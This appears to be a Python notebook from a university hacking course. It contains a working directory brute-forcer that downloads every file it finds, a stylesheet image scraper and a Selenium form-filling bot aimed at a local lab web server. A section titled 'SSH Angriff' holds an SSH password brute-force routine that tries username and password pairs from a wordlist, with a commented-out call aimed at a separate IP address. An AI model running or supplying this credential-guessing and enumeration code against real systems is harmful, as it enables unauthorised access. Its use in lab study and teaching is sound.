In [6]:
import queue
import threading
import os
import requests
from urllib.request import urlopen, Request
from urllib.error import HTTPError
from bs4 import BeautifulSoup
from urllib import request
import urllib.request, urllib.error, urllib.parse
import re
from selenium import webdriver
import time
import paramiko
from collections import deque
import sys
import urllib3
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By

In [7]:
class MySpider():
    def __init__(self):
        pass
        
    def mygobuster(self,target):
        wordlist = [a.strip() for a in open("wordlist.txt")]
        filters = [".html",".css","jpg", "",".js",".md",".png"]
        html = open("html.txt", "a+") 
        for word in wordlist:
            for f in filters:
                url = target+word+f
                re = requests.head(url)

                if re.status_code==301 or re.status_code==401:
                    print("Directory found: ", re.url, re.status_code)
                    newurl = re.url+"/"
                    
                    self.mygobuster(newurl)

                elif re.status_code==200:
                    print("Found: ", re.url, re.status_code)
                    response = urllib.request.urlopen(url)
                    if ".html" in re.url:
                        html.write(re.url+"\n")
                    try:
                        Content = response.read().decode('utf-8')
                        f = open("found/"+str(re.url).replace("/",""), 'w+')
                        f.write(Content)
                        f.close()
                    except:
                        Content = response.read()
                        f = open("found/"+str(re.url).replace("/",""), 'wb+')
                        f.write(Content)
                        f.close()
                else:
                    continue

    def CSSbuster(self, target):
        r  = requests.get(" http://172.17.0.2:1337/stylesheet.css")
        data = r.text
        l = []
        for i in re.findall('url\(([^)]+)\)',data):
            l.append(i)
        s = [x[2:].strip('""') for x in l[:2]]
        for j in s:
            response = urllib.request.urlopen(target+j)
            if response.code==200:
                print("Picture found:", target+j)
                con = response.read()
                f = open("found/"+str(response.url).replace("/",""), 'wb+')
                f.write(con)
            else:
                pass
    
    
    def myBot(self):
        
        s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
        browser = webdriver.Firefox(service=s)
        for url in open("html.txt"):
            if url=="http://172.17.0.2:1337/biete.html\n":
                browser.get(url)
                eingabe = browser.find_element(By.ID,"ort")
                eingabe.send_keys("Salzburg")
                time.sleep(1)
                eingabe2 = browser.find_element(By.ID,"preis")
                eingabe2.send_keys("1500")
                time.sleep(1)
                eingabe2 = browser.find_element(By.ID,"zimmer")
                eingabe2.send_keys("5")
                time.sleep(1)
                eingabe3 = browser.find_element(By.ID,"flaeche")
                eingabe3.send_keys("500")
                time.sleep(1)
                eingabe4 = browser.find_element(By.ID,"kontakt")
                eingabe4.send_keys("Mori.r@web.de")
                time.sleep(1)

                ein = browser.find_element(By.ID,"saveimmoButton")
                ein.click()
                time.sleep(1)
            browser.get(url)
            time.sleep(1)


In [11]:
S = MySpider()
#S.mygobuster("http://172.17.0.2:1337/")
#S.CSSbuster("http://172.17.0.2:1337/")
#S.myBot()

**SSH Angriff**

In [1]:
import sys
import paramiko
from collections import deque
import queue
import paramiko
import time

def attackssh(ip):
    try:
        global que
        if len(que)==0:
            print("Not found, maybe try a new wordlist?!")
            return 1
        print("Attacking ssh.....")
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        for line in range(len(que)):
            [username, password] = que.popleft().strip().split()
            try:
                print(f"Trying with {username} {password}")
                conn = ssh.connect(ip, username=username,password=password, banner_timeout=200)
                if conn is None:
                    print(f"Successfully Authenticated with {username} {password}")
                    return 1
            
            except paramiko.AuthenticationException:
                print("Failed!")
                continue
            
            except paramiko.SSHException:
                continue
                
    except NameError:
        que = deque()
        for word in open("sshwordlist.txt", "r").readlines():
            que.append(word)
        attackssh("172.17.0.2")        
        

In [4]:
#attackssh("141.87.29.101")        


In [5]:
#enumerate wordlist to check if recursive calling works properly
file = open("sshwordlist.txt")
newfile = open("ssh","w+")
for word, count in enumerate(file):
        newfile.write(str(count)+str(word))


In [1]:
 def mygobuster(self,target):
        wordlist = [a.strip() for a in open("wordlist.txt")]
        filters = [".html",".css","jpg", "",".js",".md",".png"]
        html = open("html.txt", "a+") 
        for word in wordlist:
            for f in filters:
                url = target+word+f
                re = requests.head(url)

                if re.status_code==301 or re.status_code==401:
                    print("Directory found: ", re.url, re.status_code)
                    newurl = re.url+"/"
                    
                    self.mygobuster(newurl)

                elif re.status_code==200:
                    print("Found: ", re.url, re.status_code)
                    response = urllib.request.urlopen(url)
                    if ".html" in re.url:
                        html.write(re.url+"\n")
                    try:
                        Content = response.read().decode('utf-8')
                        f = open("found/"+str(re.url).replace("/",""), 'w+')
                        f.write(Content)
                        f.close()
                    except:
                        Content = response.read()
                        f = open("found/"+str(re.url).replace("/",""), 'wb+')
                        f.write(Content)
                        f.close()
                else:
                    continue